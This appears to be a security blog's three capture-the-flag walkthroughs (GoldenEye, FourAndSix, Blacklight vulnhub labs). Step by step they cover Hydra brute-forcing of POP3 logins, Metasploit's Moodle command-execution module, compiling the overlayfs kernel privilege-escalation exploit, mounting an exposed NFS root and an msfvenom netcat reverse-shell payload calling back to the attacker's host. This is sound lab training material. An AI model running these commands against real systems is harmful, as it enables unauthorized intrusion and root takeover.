Hack the Golden Eye:1 (CTF Challenge)

Welcome to another boot2root CTF challenge “Golden Eye” uploaded by Creosote on vulnhub. As, there is a theme, and you will need to snag the flag in order to complete the challenge and you can download it from: https://www.vulnhub.com/entry/goldeneye-1,240/

This lab was very confusing to even begin with due to the lack of description by author, it has a good variety of techniques needed to get root - no exploit development/buffer overflows. So, on the basis of our experience and knowledge, we have made progress in solving the lab.

Level: Intermediate

Penetrating Methodologies:

§  Network scanning (Nmap)

§  Surfing HTTP web services

§  Fetched Encoded password

§  Decoding (Burp suite)

§  Brute-Force (Hydra)

§  Connecting to pop3 (Netcat)

§  Extracting password

§  Adding domain Name (/etc/host)

§  Exploring Domain Name over browser

§  Brute-force (Hydra)

§  Login to Server

§  Exploiting Moodle (Metasploit)

§  Kernel post Exploit (overlayfs)

§  Capture the flag

Let’s start

First and foremost we’ll scan the IP address with nmap. In my case, the IP address was 192.168.1.140.

nmap  -p- -A 192.168.1.140 --open

Since port 80 was opened; so I explored target IP in the web browser. Here we got a little clue for login page /sev-home/ as you can see in the image.

After that we thought to check it’s the source code which lead us to another clue to move ahead. Here we clicked on the link terminal.js as shown in the image.

The terminal.js put-up HTML code in front us. Inside this html code I read the given comment captured hint for two usernames (Boris, Natalya) and a password which was encoded as shown in the below image.

We copied the above encoded text and use brup decoder for decoding HTML encoded text into plain text and obtain “InvincibleHack3r” password.

From the earlier clue of navigating to /sev-home/ to login. We browsed 192.168.1.140/sev-home/ in the browser and we got a clue that it has POP3 service as shown in the image.

Earlier we had enumerated the port 55006 and 55007 was open for unknown service thus we used nmap version scan for them and found ssl/pop3 for 55006 and pop3 for 55007 along their version.

So after getting two usernames we applied brute-force for each users attack with help of following command:

hydra -l boris -P /usr/share/wordlists/fasttrack.txt -f 192.168.1.140 -s 55007 pop3

We got the password: secret1 for username boris as shown in the image.

Similarly with user natalya on port 55007 by using command:

hydra -l natalya -P /usr/share/wordlists/fasttrack.txt -f 192.168.1.140 -s 55007 pop3.

We got the password: bird for username natalya as shown in the image.

Using Netcat command we have logged in with the username: boris and password: secret1! .This gave us three messages as shown in the image.

Now reading all of the three messages, the clues given in the messages were of no use and are just made to confuse you, as it has wasted our time to make a clue out of it.

Similarly using Netcat command we have logged in with the username: natalya and password: bird. This gave us two messages as shown in the image.

nc 192.168.1.140 55007

After opening all the messages, we saw some clues like username and password, domain name along with a directory name of the domain.

Username: xenia

Password: RCP90rulez!

Domain name: /severnaya-station.com/

Server directory: /gnocertdir

From this point we thought of the adding the servers IP along the domain name into linux /etc/hosts. File.

As you can see in the image we have added the domain named along with servers IP inside /etc/host file in our local machine and saved it.

Next we thought of browsing /gncertdir along with the Domain name.
http://severnaya-station.com/gnocertdir

Ohhh!!!  It was GoldenEye welcome page which was designed with in Moodle CMS, this can be taken as a hint for further use.

Now on further exploring the tabs on the page, inside message box we opened the recent found conversation between Xenia and Doak (another new user).

Then again use hydra for fetching password for doak with help of following command

hydra -l doak -P /usr/share/wordlists/fasttrack.txt -f 192.168.1.140 -s 55007 pop3

We got the password: goat for username doak as shown in the image.

Using Netcat command we have logged in with the username: doak and password: goat .This gave us a message. Now futher reading the message, we acquired a username and password.

Username: dr_doak

Password: 4England!

Now Logging in with the acquired username: dr_doak and password: 4England! into the domains login page as shown in the image. On exploring the all tabs in the navigation section of the page, we saw a s3cret.txt file in my private files.

 So we download s3cret.txt and open it with help of cat command. It gave me the path for jpg image. 

We have downloaded the image file and opened it where we saw an encoded line into base64 format, it made us curious to decode it.

wget http://severnaya-station.com/ /dir007key/for-007.jpg

string for-007.jpg

echo {base64 encode text} | base64 -d

And found xWinter1995x! as plain text which could be any password.

Now further exploring the website we have logged into lead us to TinyMCE HTML editor inside the plugins and text editors tab. Here we have selected Google spell as a spell engine and saved the changes. But it didn’t work here, so I took help of Google.

After searching for the Moodle Exploit, we found an exploit 29324, here we saw that spell engine selected for tiny MCE is PSpellShell as shown in the image. Here we have also got a clue of a new Username: admin.

So now we have changed the Spell engine to PSpellShell and saved the changes made.

Moodle allows an authenticated user to define spellcheck settings via the web interface. The user can update the spellcheck mechanism to point to a system-installed aspell binary. By updating the path for the spellchecker to an arbitrary command, an attacker can run arbitrary commands in the context of the web application upon spellchecking requests. This module also allows an attacker to leverage another privilege escalation vuln.

use exploit/multi/http/moodle_cmd_exec

msf exploit(moodle_cmd_exec) > set rhost severnaya-station.com

msf exploit(moodle_cmd_exec) > set targeturi /gnocertdir

msf exploit(moodle_cmd_exec) > set username admin

msf exploit(moodle_cmd_exec) > set password xWinter1995x!

Booom!!! We successfully got command shell session 1.

As we love meterpreter session, so I upgrade it into meterpreter shell.

session -u 1

Then with help of sysinfo we enumerate its kernel, here we focused on Linux version which is 3.13 and if you will search in Google then you find post exploit for  Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation

So we search kernel exploit for linux 3.13 and found exploit 37292 inside kali.

searchsploit linux 3.13

 Then with help of gcc we compile it as shell inside /root direcrtoy.

Then upload the compiled shell file into victim’s machine via meterpreter. Then use python one-liner to access proper terminal and run following command.

python –c 'import pty;pty.spawn("/bin/bash")'

chmod 777 shell

./shell

Unfortunately!! Got error gcc not found.

We saw a message after accessing it that gcc is not currently installed. So to solve this issue we thought some alternative program to gcc and found cc as alternative of it.
By making changes into the original file: 37292.c, we replace gcc to cc as shown in the image.

We have successfully compiled the exploit using cc command:.

cc 37292.c -o raj

Now by uploading the shell into the root directory. By giving all the permissions and we have easily access it without any error message.

upload /root/raj

chmod 777 raj

./raj

Yuppiee!! We got root access successfully!! 

Now let’s finish this task by capturing flag.txt form inside /root directory. 

Hacking the FourAndSix (CTF Challenge)

Hacking the FourAndSix (CTF Challenge)

FourAndSix is a CTF challenge uploaded by Fred on vulnhub. You can download it from here.

The aim of this lab is to capture a flag in the root directory.

This lab was very confusing to even begin with due to the lack of description by author. So, on the basis of our experience, we have progressed in the lab. 

Steps involved:

1.      Port scanning and discovery of ports.

2.      Discovery of shared folder (misconfigured nfs).

3.      Mounting a directory to see the contents in the shared folder.

4.      Mounting and checking the root directory.

5.      Capturing the flag.

Let’s get started then!

First and foremost we’ll scan the IP address with nmap. In my case, the IP address was: 192.168.1.105.

nmap –A 192.168.1.105

We established from the scan that there is an nfs service running.

Network File System (NFS): Network File System permits a user on a client machine to mount the shared files or directories over a network. NFS uses Remote Procedure Calls (RPC) to route requests between clients and servers. Although NFS uses TCP/UDP port 2049 for sharing any files/directories over a network.

Let us check the people having access to the shared folder.

showmount –e 192.168.1.105

We see that everyone has access to the shared folder.

Now for the sake of checking what is in the shared folder, we’ll create a directory in the /tmp folder to mount contents of the shared folder.

cd /tmp

mkdir raj

mount –t nfs 192.168.1.105:/shared  /tmp/raj

cd raj

ls

We have received an image file in our new directory.

Let’s try and mount this image file to see the contents in it.

mkdir usbstick

mount USB-stick.img usbstick

cd usbstick/

ls –la

But we obtained nothing useful at all.

Let’s check and see if the root directory is shareable or not.

mkdir main

mount 192.168.1.105:/ main

cd main

ls –la

Yes! It indeed is shareable.

Let’s move in the root directory now.

cd root

ls –la

We see a text file called proof.txt!

cat proof.txt

Voila! We have obtained the flag! Happy hacking!

Hacking the Blacklight: 1 (CTF Challenge)

Hello everyone. In this article we’ll be hacking a new lab Blacklight. The motto of the lab is to capture 2 flags. It is made by Carter B (downloadable from here) and after a lot of brainstorming, we are presenting before you a really efficient method to get root and capture the flags.

Steps involved:

1.      Network discovery and port scan

2.      Directory busting the server

3.      Accessing robots.txt on the webpage

4.      Capturing flag 1 from robots.txt and discovery of a new port 9072

5.      Connection to port 9072 to upload a netcat reverse shell

6.      Getting root access and capturing second flag

Let’s get started then.

First and foremost, we’ll discover the IP address of the lab. In my case, the IP is 192.168.1.102

Let’s scan all the open ports with the most popular tool nmap. A simple nmap might show less ports open so we try the all ports scan:

nmap -p-  -A  192.168.1.102  - -open

We discovered that port 80 is open. So there must be a webpage associated with it. Let’s move towards our browser and check the website.

There seems nothing interesting here! But wait… maybe there are some directories that could have something valuable for us.

Let’s do a directory buster scan over the IP then.

dirb 192.168.1.102

We observed that robots.txt is available here. It surely would have some information or some directories that could be beneficial. Let’s go over to our browser and access this.

Boom! There it is! Our very first flag. Let’s see what’s in there.

We have got a hash as flag1. But the next flag is unknown. But wait, the second line of this file says 9072! So, it has something to do with 9072 port and “the secret is at home” means only one thing—the next flag is at home. But to access home, we’ll have to be rooted.

There is another dictionary file present here but the current use of it is unknown.

Holding that thought, let’s go ahead and try connecting to port 9072 with telnet.

Hey! We successfully connected to a console but there is a boundation provided by the author here. We cannot execute more than 2 commands in this console! As soon as we hit 2 commands the server will quit and the listener won’t accept a connection again.

So, first command that we type is .help, it will show us a list of things that we can do:

.readhash

.exec

.quit

The obvious choice was .readhash but here is another fish! It is of no use! Just like the dictionary provided in robots.txt was of no use!

Now, we’ll try and upload a reverse netcat shell over the command line interface using msfvenom:

msfvenom –p cmd/unix/reverse_netcat lhost=192.168.1.120 lport=4444 R

Copy the raw code provided (mkfinfo /tmp/cdbe; nc 192.168.1.120 4444 0

tmp/cdbe 2>&1; rm /tmp/cdbe)

We’ll paste this code in the blacklight console using .exec command:

.exec mkfinfo /tmp/cdbe; nc 192.168.1.120 4444 0

tmp/cdbe 2>&1; rm /tmp/cdbe

The unique thing about this console is that the output of any command will never be shown. It all will happen in background and then you’ll have to manually dump it. But let’s not go there as there is no need.

Side by side, let’s set up a netcat listener over port 4444 for the payload we just inserted.

AND WE HAVE A CONNECTION!

whoami

Told us we are in root.

But this is not a proper shell. Let us spawn a pty shell using the python command:

python –c ‘import pty;pty.spawn(“/bin/bash”)’

And we have a proper shell now!

Remember what flag1.txt told us? The secret is at home!

cd home

ls

cd blacklight

ls

We found a text file called hash.txt!

cat hash.txt

We examined the home directory one more time. We found a directory called secret! Remember when flag1.txt told us that the secret is in home? Lets check what is inside the .secret directory.

We obtained an image file called "flag2-inside.jpg" 

cd /home

cd blacklight

ls -la

cd .secret

It is obvious from the name of the file that the flag is inside this image. So, lets copy it inside the /var/www/html directory.

cp flag2-inside.jpjg /var/www/html

Let us run this on the web page now! 

Hmmmm... Why are these two words capitalized? 

Wait! There is a tool called OUTGUESS!

Let's download this image on the Desktop and use outguess to copy the flag hidden in a file called flag2.txt

./outguess -r /root/Desktop/flag2-inside.jpg -t flag2.txt

cat flag2.txt

Finally! We obtained the second flag! Happy Hacking!